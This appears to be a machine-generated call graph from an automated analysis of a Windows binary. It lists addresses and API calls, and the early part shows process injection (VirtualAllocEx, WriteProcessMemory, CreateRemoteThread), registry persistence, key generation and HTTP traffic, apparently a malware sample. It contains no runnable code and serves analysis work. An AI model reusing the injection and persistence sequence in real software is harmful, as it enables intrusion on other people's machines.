19547->19548 19549 40093c9 lstrcatA 19548->19549 19549->19547 19550->19372 19552 4004b96 19551->19552 19553 4004ad6 CoInitialize 19551->19553 19554 4004ade 19553->19554 19555 4004b80 Sleep 19554->19555 19556 4004aeb WaitForSingleObject 19554->19556 19555->19554 19556->19555 19557 4004b01 EnterCriticalSection 19556->19557 19617 4008250 19557->19617 19560 4004b50 19622 40062b0 19560->19622 19563 4004b90 CoUninitialize 19563->19552 19565 40056f0 CoUninitialize 19564->19565 19566 4004bc2 19564->19566 19567 4004bd1 SetEvent 19566->19567 19568 4004bf9 19567->19568 19568->19565 19569 4004c10 WaitForSingleObject 19568->19569 19570 4004c28 VirtualAlloc VirtualAlloc VirtualAlloc 19568->19570 19569->19570 19571 4004c23 19569->19571 19570->19571 19572 4004c8a 19570->19572 19571->19565 19572->19571 19575 4004cc3 19572->19575 19576 40052a2 19572->19576 19580 4004db7 GetCurrentThreadId 19575->19580 19581 4004e2c 19575->19581 19615 4004ce5 19575->19615 19819 4008370 19576->19819 19577 4005354 lstrlenA lstrlenA 19578 40056b8 VirtualFree VirtualFree VirtualFree 19577->19578 19579 4005385 wsprintfA CryptBinaryToStringA 19577->19579 19578->19571 19579->19578 19582 40053d0 MultiByteToWideChar 19579->19582 19580->19615 19583 4004ee1 19581->19583 19584 4004e81 GetSystemMetrics GetSystemMetrics 19581->19584 19581->19615 19838 40017d0 19582->19838 19587 4004f40 19583->19587 19588 4004ef0 GlobalMemoryStatus 19583->19588 19584->19615 19593 4005032 19587->19593 19594 4004fdf lstrlenA 19587->19594 19587->19615 19588->19615 19589 400569b 19589->19578 19590 40056a4 VirtualFree 19589->19590 19590->19578 19591 400551b 19591->19589 19596 400552c EnterCriticalSection 19591->19596 19592 400547d VirtualFree 19595 40054b1 19592->19595 19597 4005041 lstrlenA 19593->19597 19598 4005096 19593->19598 19594->19615 19595->19591 19605 40017d0 16 API calls 19595->19605 19601 4005542 VirtualAlloc 19596->19601 19602 400558c VirtualAlloc 19596->19602 19597->19615 19599 4005104 19598->19599 19600 40050a5 lstrlenA 19598->19600 19607 4005172 19599->19607 19608 4005113 lstrlenA 19599->19608 19600->19615 19606 4005578 19601->19606 19603 40055c7 GetTickCount 19602->19603 19604 400568e LeaveCriticalSection 19602->19604 19614 40055da 19603->19614 19604->19589 19605->19595 19606->19604 19609 40051e0 19607->19609 19610 4005181 lstrlenA 19607->19610 19608->19615 19611 400523f 19609->19611 19612 40051ef lstrlenA 19609->19612 19610->19615 19613 4009b90 QueryPerformanceCounter 19611->19613 19611->19615 19612->19615 19613->19615 19616 400565c VirtualFree 19614->19616 19616->19604 19618 4004b37 LeaveCriticalSection 19617->19618 19621 4008267 19617->19621 19618->19555 19618->19560 19619 40082e7 StrStrA 19619->19618 19619->19621 19621->19618 19621->19619 19707 4008090 19621->19707 19623 4004b5d VirtualFree SetEvent 19622->19623 19625 40062ca 19622->19625 19623->19563 19624 4006427 19624->19623 19627 40064ba GetEnvironmentVariableA 19624->19627 19635 40065f3 19624->19635 19625->19623 19625->19624 19628 4006399 19625->19628 19626 40065fe 19626->19626 19629 40064e1 19627->19629 19631 4006410 19628->19631 19632 40063a4 VirtualAlloc 19628->19632 19722 4009730 19629->19722 19630 4006bdd 19633 4006c13 19630->19633 19796 400a360 19630->19796 19634 4001ee0 2 API calls 19631->19634 19636 400640e 19632->19636 19642 40063cc 19632->19642 19634->19636 19635->19626 19635->19630 19761 4007250 19635->19761 19636->19624 19643 40063fd VirtualFree 19642->19643 19719 4001ee0 CreateThread 19642->19719 19643->19636 19644 4006552 WriteFile 19647 4006588 19644->19647 19648 40065dd 19644->19648 19645 4006654 VirtualAlloc 19651 4006752 19645->19651 19655 400667a 19645->19655 19647->19648 19653 4006593 CloseHandle 19647->19653 19648->19635 19649 40065e6 CloseHandle 19648->19649 19649->19635 19652 40069ba GetEnvironmentVariableA 19651->19652 19656 4006858 19651->19656 19657 400678e VirtualAlloc 19651->19657 19654 40069e1 19652->19654 19726 4006c60 19653->19726 19662 4009730 QueryPerformanceCounter 19654->19662 19773 40097a0 GetProcessHeap RtlAllocateHeap 19655->19773 19659 4002070 32 API calls 19656->19659 19660 4006856 19657->19660 19675 40067c6 19657->19675 19659->19660 19667 40069a6 19660->19667 19672 4006880 19660->19672 19673 4006894 19660->19673 19665 40069f2 GetTickCount GetTempFileNameA CreateFileA 19662->19665 19671 4006a4f 19665->19671 19706 4006bbd 19665->19706 19666 4006698 CreateThread CloseHandle 19666->19651 19667->19652 19669 40065d8 19669->19648 19677 4006cf0 4 API calls 19669->19677 19670 40065c9 19738 40074a0 19670->19738 19678 4006a7b VirtualAlloc 19671->19678 19679 4006b1e WriteFile 19671->19679 19777 40073c0 19672->19777 19681 400698a 19673->19681 19784 40097a0 GetProcessHeap RtlAllocateHeap 19673->19784 19674 4006842 VirtualFree 19674->19660 19675->19674 19774 4002070 19675->19774 19677->19648 19684 4006b1c 19678->19684 19685 4006aaf 19678->19685 19679->19684 19681->19667 19785 4002510 19681->19785 19692 4006bc9 CloseHandle 19684->19692 19696 4006b59 CloseHandle 19684->19696 19699 4006ad2 WriteFile 19685->19699 19700 4006b08 VirtualFree 19685->19700 19689 40068aa 19693 40068e9 VirtualAlloc 19689->19693 19694 40068ca 19689->19694 19690 4006809 VirtualAlloc 19695 400683f 19690->19695 19692->19706 19693->19694 19698 400690f 19693->19698 19694->19681 19702 400693f CreateThread CloseHandle 19694->19702 19695->19674 19697 4001e60 2 API calls 19696->19697 19701 4006b72 19697->19701 19698->19694 19699->19700 19700->19684 19703 4006b9e 19701->19703 19704 40073c0 5 API calls 19701->19704 19701->19706 19702->19681 19801 40077b0 19702->19801 19705 4002510 8 API calls 19703->19705 19703->19706 19704->19703 19705->19706 19706->19630 19708 4008246 19707->19708 19709 40080a7 19707->19709 19708->19621 19709->19708 19710 40080c5 VirtualAlloc 19709->19710 19710->19708 19711 40080eb 19710->19711 19712 4001390 6 API calls 19711->19712 19714 4008100 19712->19714 19713 4008235 VirtualFree 19713->19708 19715 4008a70 9 API calls 19714->19715 19718 4008204 19714->19718 19716 40081dd 19715->19716 19717 40081e4 VirtualAlloc 19716->19717 19716->19718 19717->19718 19718->19708 19718->19713 19720 4001f21 19719->19720 19721 4001f0a WaitForSingleObject 19719->19721 19720->19643 19721->19720 19723 4009743 19722->19723 19725 40064f2 GetTickCount GetTempFileNameA CreateFileA 19722->19725 19724 4009763 QueryPerformanceCounter 19723->19724 19723->19725 19724->19723 19725->19635 19725->19644 19727 4006c83 RegOpenKeyExA 19726->19727 19728 4006c7c 19726->19728 19729 40065ab 19727->19729 19730 4006ca7 19727->19730 19728->19727 19733 4001e60 19729->19733 19731 4009b90 QueryPerformanceCounter 19730->19731 19732 4006cae RegSetValueExA RegCloseKey 19731->19732 19732->19729 19734 4001ece 19733->19734 19735 4001e73 19733->19735 19734->19669 19734->19670 19736 4001e90 CreateProcessA 19735->19736 19736->19734 19737 4001ebe CloseHandle 19736->19737 19737->19734 19739 40074bc 19738->19739 19740 40074d2 Sleep 19739->19740 19741 40074f5 GetModuleFileNameA 19740->19741 19742 400750b 19740->19742 19743 4007583 SetFileAttributesA wnsprintfA 19741->19743 19744 4007520 GetAllUsersProfileDirectoryA 19742->19744 19745 4007536 GetEnvironmentVariableA 19742->19745 19747 40075d4 RegOpenKeyExA 19743->19747 19748 40075c6 TerminateThread 19743->19748 19746 400754d lstrcatA lstrcatA lstrcatA 19744->19746 19745->19746 19746->19743 19750 4007649 19747->19750 19751 400762a RegDeleteValueA RegCloseKey 19747->19751 19748->19747 19752 400765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 19750->19752 19753 4005e30 6 API calls 19750->19753 19751->19750 19754 40065ce ExitProcess 19752->19754 19755 40076df lstrlenA WriteFile CloseHandle 19752->19755 19756 400765b 19753->19756 19757 4007731 19755->19757 19756->19752 19758 4007744 CreateProcessA 19757->19758 19759 40077a3 ExitProcess 19758->19759 19760 4007796 CloseHandle 19758->19760 19760->19759 19762 4006638 19761->19762 19763 4007264 19761->19763 19762->19645 19762->19651 19763->19762 19764 40072ad wsprintfA 19763->19764 19765 40072d8 19764->19765 19766 40072df RegOpenKeyExA 19764->19766 19765->19766 19766->19762 19767 4007307 RegQueryValueExA 19766->19767 19768 4007333 19767->19768 19769 40073a5 RegCloseKey 19767->19769 19768->19769 19770 4007339 GetLocalTime 19768->19770 19769->19762 19771 4009910 SystemTimeToFileTime SystemTimeToFileTime 19770->19771 19772 4007388 19771->19772 19772->19769 19773->19666 19775 40020b0 32 API calls 19774->19775 19776 4002080 19775->19776 19776->19674 19776->19690 19778 4006891 19777->19778 19779 40073d0 19777->19779 19778->19673 19779->19778 19780 4007419 wsprintfA 19779->19780 19781 4007444 19780->19781 19782 400744b RegOpenKeyExA 19780->19782 19781->19782 19782->19778 19783 400746f GetLocalTime RegSetValueExA RegCloseKey 19782->19783 19783->19778 19784->19689 19786 4002527 19785->19786 19788 4002573 19785->19788 19787 4002531 VirtualAlloc 19786->19787 19786->19788 19787->19788 19789 400257a VirtualAllocEx 19787->19789 19788->19667 19790 400259f VirtualAllocEx 19789->19790 19792 40025d7 19789->19792 19791 40025bf VirtualFree 19790->19791 19790->19792 19791->19788 19793 4002653 WriteProcessMemory 19792->19793 19794 4002672 VirtualFree 19793->19794 19795 4002687 VirtualFree CreateRemoteThread 19793->19795 19794->19788 19795->19788 19797 400a3ed 19796->19797 19798 400a370 19796->19798 19797->19633 19798->19797 19799 400a39b RegOpenKeyExA 19798->19799 19799->19797 19800 400a3bf RegSetValueExA RegCloseKey 19799->19800 19800->19797 19802 40077c0 CoInitialize 19801->19802 19803 40078c3 19801->19803 19804 40077e8 19802->19804 19805 40078bd CoUninitialize 19802->19805 19806 4007898 VirtualFree 19804->19806 19807 40077fc GetExitCodeProcess 19804->19807 19805->19803 19810 40097c0 GetProcessHeap HeapFree 19806->19810 19808 400788f 19807->19808 19809 4007818 19807->19809 19808->19806 19811 4007821 Sleep 19809->19811 19812 400782e CloseHandle Sleep 19809->19812 19813 40078ba 19810->19813 19811->19808 19814 4002070 32 API calls 19812->19814 19813->19805 19816 4007851 19814->19816 19815 4007863 19815->19806 19816->19808 19816->19815 19817 4002510 8 API calls 19816->19817 19818 400788c 19817->19818 19818->19808 19820 4005344 19819->19820 19821 4008387 19819->19821 19820->19577 19820->19578 19821->19820 19822 40083b1 VirtualAlloc VirtualAlloc 19821->19822 19823 4008592 19822->19823 19824 40083e9 19822->19824 19825 4008598 VirtualFree 19823->19825 19826 40085a9 19823->19826 19824->19823 19842 4008800 19824->19842 19825->19826 19826->19820 19828 40085af VirtualFree 19826->19828 19828->19820 19834 400847e 19864 4008970 19834->19864 19836 4008581 VirtualFree 19836->19823 19837 40084ad 19837->19836 19839 40017e1 19838->19839 19841 400181e 19838->19841 19839->19841 19875 4001840 19839->19875 19841->19589 19841->19591 19841->19592 19843 4008817 19842->19843 19844 4008420 19842->19844 19843->19844 19845 4008821 CryptAcquireContextA 19843->19845 19844->19823 19858 4008770 19844->19858 19846 4008845 GetLastError 19845->19846 19847 400887a 19845->19847 19849 4008860 CryptAcquireContextA 19846->19849 19850 4008857 19846->19850 19847->19844 19848 4008884 CryptGenKey 19847->19848 19851 4008950 CryptReleaseContext 19848->19851 19852 40088bd CryptExportKey 19848->19852 19849->19847 19850->19847 19850->19849 19851->19844 19853 4008946 CryptDestroyKey 19852->19853 19854 40088d9 19852->19854 19853->19851 19855 400893d 19854->19855 19856 40088f1 CryptImportKey 19854->19856 19855->19853 19856->19855 19857 4008916 CryptExportKey CryptDestroyKey 19856->19857 19857->19855 19859 40087d0 QueryPerformanceCounter 19858->19859 19860 400844b 19859->19860 19861 40087d0 19860->19861 19862 40087e3 QueryPerformanceCounter 19861->19862 19863 4008458 VirtualAlloc 19861->19863 19862->19863 19863->19823 19863->19834 19865 4008a60 19864->19865 19866 4008987 19864->19866 19865->19837 19866->19865 19867 40089a5 CryptAcquireContextA 19866->19867 19868 40089c9 GetLastError 19867->19868 19869 40089fe 19867->19869 19870 40089e4 CryptAcquireContextA 19868->19870 19871 40089db 19868->19871 19869->19865 19872 4008a04 CryptImportKey 19869->19872 19870->19869 19871->19869 19871->19870 19873 4008a54 CryptReleaseContext 19872->19873 19874 4008a29 CryptEncrypt CryptDestroyKey 19872->19874 19873->19865 19874->19873 19876 4001c95 19875->19876 19877 400185a 19875->19877 19876->19841 19877->19876 19878 40018ba InternetCrackUrlA 19877->19878 19878->19876 19879 4001910 InternetOpenA 19878->19879 19879->19876 19880 4001936 InternetConnectA 19879->19880 19881 4001c88 InternetCloseHandle 19880->19881 19882 400196f HttpOpenRequestA 19880->19882 19881->19876 19883 4001c7b InternetCloseHandle 19882->19883 19884 40019ad wnsprintfA HttpAddRequestHeadersA 19882->19884 19883->19881 19885 40019eb InternetSetOptionA 19884->19885 19886 4001c6e InternetCloseHandle 19884->19886 19895 4001a30 19885->19895 19886->19883 19888 4001a4d HttpSendRequestA 19889 4001a7b HttpQueryInfoA 19888->19889 19888->19895 19889->19895 19890 4001adc HttpQueryInfoA 19891 4001b47 VirtualAlloc 19890->19891 19890->19895 19892 4001c19 19891->19892 19891->19895 19894 4001c23 InternetReadFile 19892->19894 19893 4001b99 InternetReadFile 19893->19895 19894->19894 19894->19895 19895->19886 19895->19888 19895->19890 19895->19891 19895->19893 19896 1066a5 19936 108f60 19896->19936 19898 1066b1 GetStartupInfoW 19899 1066c5 HeapSetInformation 19898->19899 19901 1066d0 19898->19901 19899->19901 19937 1083ec HeapCreate 19901->19937 19902 10671e 19903 106729 19902->19903 20050 10667c 19902->20050 19938 1076b6 GetModuleHandleW 19903->19938 19906 10672f 19907 10673a __RTC_Initialize 19906->19907 19908 10667c _fast_error_exit 66 API calls 19906->19908 19963 10a106 GetStartupInfoW 19907->19963 19908->19907 19911 106754 GetCommandLineA 19976 10a06f GetEnvironmentStringsW 19911->19976 19918 106779 20000 109d3e 19918->20000 19919 1086d7 __amsg_exit 66 API calls 19919->19918 19921 10677f 19922 10678a 19921->19922 19923 1086d7 __amsg_exit 66 API calls 19921->19923 20020 1084b6 19922->20020 19923->19922 19925 106792 19926 10679d 19925->19926 19927 1086d7 __amsg_exit 66 API calls 19925->19927 20026 109cdf 19926->20026 19927->19926 19931 1067bf 19932 1067cd 19931->19932 20065 10868d 19931->20065 20068 1086b9 19932->20068 19935 1067d2 ___lock_fhandle 19936->19898 19937->19902 19939 1076d3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19938->19939 19940 1076ca 19938->19940 19941 10771d TlsAlloc 19939->19941 20071 107403 19940->20071 19945 10776b TlsSetValue 19941->19945 19946 10782c 19941->19946 19945->19946 19947 10777c 19945->19947 19946->19906 20081 10845f 19947->20081 19952 1077c4 DecodePointer 19955 1077d9 19952->19955 19953 107827 19954 107403 __mtterm 70 API calls 19953->19954 19954->19946 19955->19953 20090 109194 19955->20090 19958 1077f7 DecodePointer 19959 107808 19958->19959 19959->19953 19960 10780c 19959->19960 20096 107440 19960->20096 19962 107814 GetCurrentThreadId 19962->19946 19964 109194 __calloc_crt 66 API calls 19963->19964 19970 10a124 19964->19970 19965 106748 19965->19911 20058 1086d7 19965->20058 19966 10a2cf GetStdHandle 19969 10a299 19966->19969 19967 109194 __calloc_crt 66 API calls 19967->19970 19968 10a333 SetHandleCount 19968->19965 19969->19966 19969->19968 19971 10a2e1 GetFileType 19969->19971 19974 10a307 InitializeCriticalSectionAndSpinCount 19969->19974 19970->19965 19970->19967 19970->19969 19975 10a219 19970->19975 19971->19969 19972 10a250 InitializeCriticalSectionAndSpinCount 19972->19965 19972->19975 19973 10a245 GetFileType 19973->19972 19973->19975 19974->19965 19974->19969 19975->19969 19975->19972 19975->19973 19977 106764 19976->19977 19978 10a08b WideCharToMultiByte 19976->19978 19989 109fb4 19977->19989 19980 10a0c0 19978->19980 19981 10a0f8 FreeEnvironmentStringsW 19978->19981 19982 10914f __malloc_crt 66 API calls 19980->19982 19981->19977 19983 10a0c6 19982->19983 19983->19981 19984 10a0ce WideCharToMultiByte 19983->19984 19985 10a0e0 19984->19985 19986 10a0ec FreeEnvironmentStringsW 19984->19986 19987 105de2 __getptd_noexit 66 API calls 19985->19987 19986->19977 19988 10a0e8 19987->19988 19988->19986 19990 109fc9 19989->19990 19991 109fce GetModuleFileNameA 19989->19991 20344 107066 19990->20344 19993 109ff5 19991->19993 20338 109e1a 19993->20338 19996 10914f __malloc_crt 66 API calls 19997 10a037 19996->19997 19998 109e1a _parse_cmdline 76 API calls 19997->19998 19999 10676e 19997->19999 19998->19999 19999->19918 19999->19919 20001 109d47 20000->20001 20003 109d4c _strlen 20000->20003 20002 107066 ___initmbctable 94 API calls 20001->20002 20002->20003 20004 109194 __calloc_crt 66 API calls 20003->20004 20007 109d5a 20003->20007 20010 109d81 _strlen 20004->20010 20005 109dd0 20006 105de2 __getptd_noexit 66 API calls 20005->20006 20006->20007 20007->19921 20008 109194 __calloc_crt 66 API calls 20008->20010 20009 109df6 20012 105de2 __getptd_noexit 66 API calls 20009->20012 20010->20005 20010->20007 20010->20008 20010->20009 20013 109e0d 20010->20013 20785 10d394 20010->20785 20012->20007 20014 107969 __invoke_watson 10 API calls 20013->20014 20015 109e19 20014->20015 20016 10d0f0 __wincmdln 76 API calls 20015->20016 20018 109ea6 20015->20018 20016->20015 20017 109fa4 20017->19921 20018->20017 20019 10d0f0 76 API calls __wincmdln 20018->20019 20019->20018 20022 1084c4 __IsNonwritableInCurrentImage 20020->20022 20794 10b99b 20022->20794 20023 1084e2 __initterm_e 20025 108503 __IsNonwritableInCurrentImage 20023->20025 20797 10623d 20023->20797 20025->19925 20027 109ced 20026->20027 20030 109cf2 20026->20030 20028 107066 ___initmbctable 94 API calls 20027->20028 20028->20030 20029 1067a3 20032 fa0b0 20029->20032 20030->20029 20031 10d0f0 __wincmdln 76 API calls 20030->20031 20031->20030 20862 f4a40 20032->20862 20036 fa0fc 20037 fa11c 20036->20037 20038 fa103 MessageBoxA 20036->20038 20872 f9f00 PeekMessageA 20037->20872 20038->19931 20043 fa17f 20045 fa195 20043->20045 20047 105de2 __getptd_noexit 66 API calls 20043->20047 20049 fa1a7 moneypunct 20043->20049 20048 105de2 __getptd_noexit 66 API calls 20045->20048 20045->20049 20047->20045 20048->20049 20889 f4700 20049->20889 20051 10668a 20050->20051 20052 10668f 20050->20052 20053 1088ca __FF_MSGBANNER 66 API calls 20051->20053 20054 10871b __NMSG_WRITE 66 API calls 20052->20054 20053->20052 20055 106697 20054->20055 20056 108435 _fast_error_exit 3 API calls 20055->20056 20057 1066a1 20056->20057 20057->19903 20059 1088ca __FF_MSGBANNER 66 API calls 20058->20059 20060 1086e1 20059->20060 20061 10871b __NMSG_WRITE 66 API calls 20060->20061 20062 1086e9 20061->20062 20946 1086a3 20062->20946 20066 10854d _doexit 66 API calls 20065->20066 20067 10869e 20066->20067 20067->19932 20069 10854d _doexit 66 API calls 20068->20069 20070 1086c4 20069->20070 20070->19935 20072 10741c 20071->20072 20073 10740d DecodePointer 20071->20073 20074 10742d TlsFree 20072->20074 20075 10743b 20072->20075 20073->20072 20074->20075 20076 10a582 20075->20076 20077 10a56a DeleteCriticalSection 20075->20077 20079 10a594 DeleteCriticalSection 20076->20079 20080 1076cf 20076->20080 20109 105de2 20077->20109 20079->20076 20080->19906 20135 1073bd RtlEncodePointer 20081->20135 20083 108467 __init_pointers __initp_misc_winsig 20136 108f48 EncodePointer 20083->20136 20085 107781 EncodePointer EncodePointer EncodePointer EncodePointer 20086 10a504 20085->20086 20087 10a50f 20086->20087 20088 10a519 InitializeCriticalSectionAndSpinCount 20087->20088 20089 1077c0 20087->20089 20088->20087 20088->20089 20089->19952 20089->19953 20091 10919d 20090->20091 20093 1077ef 20091->20093 20094 1091bb Sleep 20091->20094 20137 10d312 20091->20137 20093->19953 20093->19958 20095 1091d0 20094->20095 20095->20091 20095->20093 20148 108f60 20096->20148 20098 10744c GetModuleHandleW 20149 10a67e 20098->20149 20100 10748a InterlockedIncrement 20156 1074e2 20100->20156 20103 10a67e __lock 64 API calls 20104 1074ab 20103->20104 20159 107084 InterlockedIncrement 20104->20159 20106 1074c9 20171 1074eb 20106->20171 20108 1074d6 ___lock_fhandle 20108->19962 20110 105e16 __dosmaperr 20109->20110 20111 105ded HeapFree 20109->20111 20110->20075 20111->20110 20112 105e02 20111->20112 20115 107a0d 20112->20115 20118 1074f4 GetLastError 20115->20118 20117 105e08 GetLastError 20117->20110 20132 1073cf TlsGetValue 20118->20132 20121 107561 SetLastError 20121->20117 20122 109194 __calloc_crt 62 API calls 20123 10751f 20122->20123 20123->20121 20124 107527 DecodePointer 20123->20124 20125 10753c 20124->20125 20126 107540 20125->20126 20127 107558 20125->20127 20128 107440 __getptd_noexit 62 API calls 20126->20128 20129 105de2 __getptd_noexit 62 API calls 20127->20129 20130 107548 GetCurrentThreadId 20128->20130 20131 10755e 20129->20131 20130->20121 20131->20121 20133 1073e4 DecodePointer TlsSetValue 20132->20133 20134 1073ff 20132->20134 20133->20134 20134->20121 20134->20122 20135->20083 20136->20085 20138 10d31e 20137->20138 20142 10d339 20137->20142 20139 10d32a 20138->20139 20138->20142 20140 107a0d __mbspbrk_l 65 API calls 20139->20140 20143 10d32f 20140->20143 20141 10d34c RtlAllocateHeap 20141->20142 20145 10d373 20141->20145 20142->20141 20142->20145 20146 108912 DecodePointer 20142->20146 20143->20091 20145->20091 20147 108927 20146->20147 20147->20142 20148->20098 20150 10a693 20149->20150 20151 10a6a6 EnterCriticalSection 20149->20151 20174 10a5bc 20150->20174 20151->20100 20153 10a699 20153->20151 20154 1086d7 __amsg_exit 65 API calls 20153->20154 20155 10a6a5 20154->20155 20155->20151 20336 10a5a5 LeaveCriticalSection 20156->20336 20158 1074a4 20158->20103 20160 1070a2 InterlockedIncrement 20159->20160 20161 1070a5 20159->20161 20160->20161 20162 1070b2 20161->20162 20163 1070af InterlockedIncrement 20161->20163 20164 1070bc InterlockedIncrement 20162->20164 20165 1070bf 20162->20165 20163->20162 20164->20165 20166 1070c9 InterlockedIncrement 20165->20166 20167 1070cc 20165->20167 20166->20167 20168 1070e5 InterlockedIncrement 20167->20168 20169 1070f5 InterlockedIncrement 20167->20169 20170 107100 InterlockedIncrement 20167->20170 20168->20167 20169->20167 20170->20106 20337 10a5a5 LeaveCriticalSection 20171->20337 20173 1074f2 20173->20108 20175 10a5c8 ___lock_fhandle 20174->20175 20176 10a5ee 20175->20176 20199 1088ca 20175->20199 20184 10a5fe ___lock_fhandle 20176->20184 20235 10914f 20176->20235 20182 10a610 20186 107a0d __mbspbrk_l 65 API calls 20182->20186 20183 10a61f 20187 10a67e __lock 65 API calls 20183->20187 20184->20153 20186->20184 20189 10a626 20187->20189 20190 10a659 20189->20190 20191 10a62e InitializeCriticalSectionAndSpinCount 20189->20191 20192 105de2 __getptd_noexit 65 API calls 20190->20192 20193 10a64a 20191->20193 20194 10a63e 20191->20194 20192->20193 20241 10a675 20193->20241 20195 105de2 __getptd_noexit 65 API calls 20194->20195 20197 10a644 20195->20197 20198 107a0d __mbspbrk_l 65 API calls 20197->20198 20198->20193 20244 10cf38 20199->20244 20201 1088d1 20202 10cf38 __NMSG_WRITE 66 API calls 20201->20202 20206 1088de 20201->20206 20202->20206 20203 10871b __NMSG_WRITE 66 API calls 20204 1088f6 20203->20204 20207 10871b __NMSG_WRITE 66 API calls 20204->20207 20205 108900 20208 10871b 20205->20208 20206->20203 20206->20205 20207->20205 20209 10873c __NMSG_WRITE 20208->20209 20211 10cf38 __NMSG_WRITE 63 API calls 20209->20211 20231 108858 20209->20231 20213 108756 20211->20213 20212 1088c8 20232 108435 20212->20232 20214 108867 GetStdHandle 20213->20214 20215 10cf38 __NMSG_WRITE 63 API calls 20213->20215 20218 108875 _strlen 20214->20218 20214->20231 20216 108767 20215->20216 20216->20214 20217 108779 20216->20217 20217->20231 20269 10ced5 20217->20269 20221 1088ab WriteFile 20218->20221 20218->20231 20221->20231 20222 1087a5 GetModuleFileNameW 20223 1087c6 20222->20223 20226 1087d2 _wcslen 20222->20226 20224 10ced5 __NMSG_WRITE 63 API calls 20223->20224 20224->20226 20225 107969 __invoke_watson 10 API calls 20225->20226 20226->20225 20228 10cd78 63 API calls __NMSG_WRITE 20226->20228 20229 108848 20226->20229 20278 10cded 20226->20278 20228->20226 20287 10cc0c 20229->20287 20305 1059e6 20231->20305 20315 10840a GetModuleHandleW 20232->20315 20237 109158 20235->20237 20238 10918e 20237->20238 20239 10916f Sleep 20237->20239 20318 105e1c 20237->20318 20238->20182 20238->20183 20240 109184 20239->20240 20240->20237 20240->20238 20335 10a5a5 LeaveCriticalSection 20241->20335 20243 10a67c 20243->20184 20245 10cf44 20244->20245 20246 10cf4e 20245->20246 20247 107a0d __mbspbrk_l 66 API calls 20245->20247 20246->20201 20248 10cf67 20247->20248 20251 1079bb 20248->20251 20254 10798e DecodePointer 20251->20254 20255 1079a3 20254->20255 20260 107969 20255->20260 20257 1079ba 20258 10798e __mbspbrk_l 10 API calls 20257->20258 20259 1079c7 20258->20259 20259->20201 20263 107840 20260->20263 20264 10785f _memset __call_reportfault 20263->20264 20265 10787d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20264->20265 20266 10794b __call_reportfault 20265->20266 20267 1059e6 __NMSG_WRITE 5 API calls 20266->20267 20268 107967 GetCurrentProcess TerminateProcess 20267->20268 20268->20257 20270 10cee3 20269->20270 20271 10ceea 20269->20271 20270->20271 20276 10cf0b 20270->20276 20272 107a0d __mbspbrk_l 66 API calls 20271->20272 20273 10ceef 20272->20273 20274 1079bb __mbspbrk_l 11 API calls 20273->20274 20275 10879a 20274->20275 20275->20222 20275->20226 20276->20275 20277 107a0d __mbspbrk_l 66 API calls 20276->20277 20277->20273 20279 10cdff 20278->20279 20282 10ce03 20279->20282 20284 10ce08 20279->20284 20285 10ce46 20279->20285 20280 107a0d __mbspbrk_l 66 API calls 20281 10ce1f 20280->20281 20283 1079bb __mbspbrk_l 11 API calls 20281->20283 20282->20280 20282->20284 20283->20284 20284->20226 20285->20284 20286 107a0d __mbspbrk_l 66 API calls 20285->20286 20286->20281 20313 1073bd RtlEncodePointer 20287->20313 20289 10cc32 20290 10cc42 LoadLibraryW 20289->20290 20291 10ccbf 20289->20291 20292 10cc57 GetProcAddress 20290->20292 20294 10cd57 20290->20294 20293 10ccd9 DecodePointer DecodePointer 20291->20293 20303 10ccec 20291->20303 20292->20294 20297 10cc6d 7 API calls 20292->20297 20293->20303 20298 1059e6 __NMSG_WRITE 5 API calls 20294->20298 20295 10cd22 DecodePointer 20296 10cd4b DecodePointer 20295->20296 20299 10cd29 20295->20299 20296->20294 20297->20291 20300 10ccaf GetProcAddress EncodePointer 20297->20300 20301 10cd76 20298->20301 20299->20296 20302 10cd3c DecodePointer 20299->20302 20300->20291 20301->20231 20302->20296 20304 10cd0f 20302->20304 20303->20295 20303->20296 20303->20304 20304->20296 20306 1059f0 IsDebuggerPresent 20305->20306 20307 1059ee 20305->20307 20314 10a4fc 20306->20314 20307->20212 20310 106967 SetUnhandledExceptionFilter UnhandledExceptionFilter 20311 106984 __call_reportfault 20310->20311 20312 10698c GetCurrentProcess TerminateProcess 20310->20312 20311->20312 20312->20212 20313->20289 20314->20310 20316 10842e ExitProcess 20315->20316 20317 10841e GetProcAddress 20315->20317 20317->20316 20319 105e99 20318->20319 20332 105e2a 20318->20332 20320 108912 _malloc DecodePointer 20319->20320 20322 105e9f 20320->20322 20321 105e35 20323 1088ca __FF_MSGBANNER 65 API calls 20321->20323 20326 10871b __NMSG_WRITE 65 API calls 20321->20326 20331 108435 _fast_error_exit 3 API calls 20321->20331 20321->20332 20324 107a0d __mbspbrk_l 65 API calls 20322->20324 20323->20321 20327 105e91 20324->20327 20325 105e58 RtlAllocateHeap 20325->20327 20325->20332 20326->20321 20327->20237 20328 105e85 20330 107a0d __mbspbrk_l 65 API calls 20328->20330 20329 108912 _malloc DecodePointer 20329->20332 20333 105e83 20330->20333 20331->20321 20332->20321 20332->20325 20332->20328 20332->20329 20332->20333 20334 107a0d __mbspbrk_l 65 API calls 20333->20334 20334->20327 20335->20243 20336->20158 20337->20173 20339 109e39 20338->20339 20343 109ea6 20339->20343 20348 10d0f0 20339->20348 20341 109fa4 20341->19996 20341->19999 20342 10d0f0 76 API calls __wincmdln 20342->20343 20343->20341 20343->20342 20345 107076 20344->20345 20346 10706f 20344->20346 20345->19991 20672 106ecc 20346->20672 20351 10d084 20348->20351 20354 1059f5 20351->20354 20355 105a08 20354->20355 20359 105a55 20354->20359 20362 10756d 20355->20362 20358 105a35 20358->20359 20382 106bc3 20358->20382 20359->20339 20363 1074f4 __getptd_noexit 66 API calls 20362->20363 20364 107575 20363->20364 20365 105a0d 20364->20365 20366 1086d7 __amsg_exit 66 API calls 20364->20366 20365->20358 20367 107344 20365->20367 20366->20365 20368 107350 ___lock_fhandle 20367->20368 20369 10756d __getptd 66 API calls 20368->20369 20370 107355 20369->20370 20371 107383 20370->20371 20372 107367 20370->20372 20373 10a67e __lock 66 API calls 20371->20373 20375 10756d __getptd 66 API calls 20372->20375 20374 10738a 20373->20374 20398 1072f7 20374->20398 20377 10736c 20375->20377 20380 10737a ___lock_fhandle 20377->20380 20381 1086d7 __amsg_exit 66 API calls 20377->20381 20380->20358 20381->20380 20383 106bcf ___lock_fhandle 20382->20383 20384 10756d __getptd 66 API calls 20383->20384 20385 106bd4 20384->20385 20386 10a67e __lock 66 API calls 20385->20386 20387 106be6 20385->20387 20388 106c04 20386->20388 20389 106bf4 ___lock_fhandle 20387->20389 20391 1086d7 __amsg_exit 66 